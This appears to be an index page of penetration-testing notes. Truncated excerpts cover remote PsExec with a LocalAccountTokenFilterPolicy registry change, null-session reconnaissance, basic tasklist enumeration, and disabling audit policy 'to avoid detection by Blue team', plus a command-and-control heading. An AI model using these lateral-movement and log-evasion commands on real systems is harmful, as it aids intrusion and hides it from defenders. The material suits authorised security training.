Internal Infrastructure Pentest - Remote PsExec
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
Active Reconnaissance Methods: Null Session: net use \[DA IP Address]\ipc$ “” “/user:” here we’re trying to connec...
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
Command & Control Server: